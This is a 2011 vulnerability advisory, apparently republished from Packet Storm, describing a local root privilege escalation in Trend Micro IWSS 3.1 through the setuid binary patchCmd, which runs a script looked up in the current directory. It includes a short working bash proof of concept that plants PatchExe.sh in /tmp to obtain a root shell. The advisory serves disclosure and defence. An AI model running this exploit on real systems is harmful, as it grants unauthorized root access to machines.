Trendmicro IWSS 3.1 Privilege Escalation

26 Oct 2011 | Reported by Jose Ramon Villa | Type: packetstorm | Source: packetstormsecurity.com

Trendmicro IWSS 3.1 privilege escalation vulnerability in setuid binary execution with root access

Code
` #############################  
# BUGUROO SECURITY ADVISORY #  
#############################  
  
[ ADVISORY ]  
  
Title: Trendmicro IWSS 3.1 privilege escalation  
Product: InterScan Web Security Suite (IWSS)  
Vendor: TrendMicro  
Advisory ID: BSA-2011-002  
Advisory URL: http://buguroo.com/adv/BSA-2011-002.txt  
Date published: 25/10/2011  
  
  
[ DISCLAIMER ]  
  
Buguroo Offensive Security, S.L. assumes no liability for the use of  
the information provided in this advisory. This advisory was released  
in an effort to help the I.T. community protect themselves against a  
potentially dangerous security hole. This advisory is not an attempt  
to solicit business.  
  
  
[ INFORMATION ]  
  
Impact: Privilege escalation  
Remotely: No  
Locally: Yes  
CVSS: 8.1  
(AV:L/AC:L/Au:S/C:C/I:C/A:C/E:F/RL:U/RC:UR/CDP:H/TD:ND/CR:H/IR:H/AR:H)  
CVE: Not assigned yet.  
  
  
[ DESCRIPTION ]  
  
A vulnerability was found in TrendMicro's IWSS software that  
could allow an attacker to gain root access on the system.  
  
The binary "patchCmd" is owned by root and has the "setuid" and  
"setgid" permission bits set. Execution is allowed to all  
users.  
  
The code performs a setuid(0) before a system() call, so the  
execution takes root permissions regardless of the calling user's  
permissions.  
  
system() calls one of two scripts,  
"./PatchExe.sh" or "./RollbackExe.sh", depending on the input  
parameters of "patchCmd".  
  
The string "./" means the script is looked up in the current  
working directory, so a user can create a script with the same  
name in another path and force patchCmd to execute it.  
  
  
[ VULNERABLE PRODUCTS ]  
  
* IWSS <= 3.1 (linux)  
* IWSS <= 3.1 (solaris)  
  
  
[ WORKAROUNDS ]  
  
None at this moment.  
  
  
[ PROOF OF CONCEPT ]  
  
As a proof of concept, we create a script in a path of a user  
without privileges that simply opens a new setuid(0) Bourne shell.  
  
The binary is then executed with the appropriate input so that it  
composes the execution parameters, and privileges are escalated.  
  
--------------------------------------------------------------------  
#!/bin/bash  
# Copyright 2011 Buguroo Offensive Security - jrvilla.AT.buguroo.com  
  
cd /tmp  
echo "[*] Creating shell file"  
echo -e "#!/bin/bash\n/bin/bash" > PatchExe.sh  
echo "[*] Change permissions"  
chmod 755 PatchExe.sh  
echo "[*] Got r00t... Its free!"  
/opt/trend/iwss/data/patch/bin/patchCmd u root  
--------------------------------------------------------------------  
  
  
[ TIMELINE ]  
  
26/06/2011 - Vulnerability was identified  
28/06/2011 - Vendor contacted multiple times:  
* SR2-1-547365091  
* SR2-1-547365101  
* SR2-1-547374771  
* SR2-1-547378291  
03/08/2011 - We sent more documents to TrendMicro.  
25/10/2011 - Due to the lack of response from TrendMicro we  
publish this vulnerability.  
  
  
[ ACKNOWLEDGMENTS ]  
  
This vulnerability was discovered and researched by:  
- Jose Ramon Villa <jrvilla.AT.buguroo.com>  
  
  
[ REFERENCES ]  
  
* http://blog.buguroo.com  
* http://www.buguroo.com  
  
  
[ ABOUT BUGUROO ]  
  
Buguroo is a Spanish offensive security company founded in 2007  
exclusively dedicated to the development of IT security solutions.  
We are a 100% R+D company under continuous evolution and  
technological renovation, enabling us to stay at the vanguard of  
our sector and to offer a first class service worldwide.  
  
  
[ LICENSE ]  
  
The contents of this advisory are copyright (c) 2011 Buguroo  
Offensive Security S.L. and are licensed under a Creative Commons  
Attribution Non-Commercial Share-Alike 3.0 (International)  
  
License: http://creativecommons.org/licenses/by-nc-sa/3.0/  
  
# EOF  
`
